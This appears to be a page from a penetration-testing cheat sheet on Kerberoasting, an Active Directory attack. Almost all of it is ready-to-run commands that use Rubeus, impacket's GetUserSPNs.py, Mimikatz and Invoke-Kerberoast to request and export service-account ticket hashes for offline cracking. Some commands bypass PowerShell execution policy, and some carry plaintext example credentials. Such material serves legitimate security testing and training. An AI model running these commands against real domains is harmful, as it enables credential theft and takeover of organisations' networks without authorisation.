Kerberoasting

If an account has SPN (Service Principal Name) set. We can request that account hash and try to crack it locally

For kerberos to work, times have to be within 5 minutes between attacker and victim.

Rubeus

https://github.com/GhostPack/Rubeus

.\rubeus.exe kerberoast /creduser:ecorp\morph3 /credpassword:pass1234 /nowrap

Getting SPNs

There are many ways to do it.

https://raw.githubusercontent.com/nidem/kerberoast/master/GetUserSPNs.ps1

setspn.exe -t ecorp.local -q */*
powershell.exe -exec bypass -c "Import-Module .\GetUserSPNs.ps1"
python3 /opt/impacket/examples/GetUserSPNs.py -request  -target-domain ecorp.local ecorp/morph3:[email protected] -dc-ip 10.10.10.21

Mimikatz

Listing cached tickets

Invoke-Mimikatz -Command '"kerberos::list"'
powershell.exe -c "klist"
powershell.exe -c "Import-Module C:\Users\Public\Invoke-Mimikatz.ps1; Invoke-Mimikatz -Command '"kerberos::list"'"

Extracting tickets

Invoke-Mimikatz -Command '"kerberos::list /export"'

Invoke-Kerberoast

This powershell script is always my go to. It works pretty fine

https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Kerberoast.ps1

powershell.exe -c "Import-Module C:\Users\Public\Invoke-Kerberoast.ps1; Invoke-Kerberoast -OutputFormat Hashcat"

powershell.exe -ep bypass -nop
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerberoast.txt

PreviousSeDebugPrivilege NextLateral Movement

Last updated 2 years ago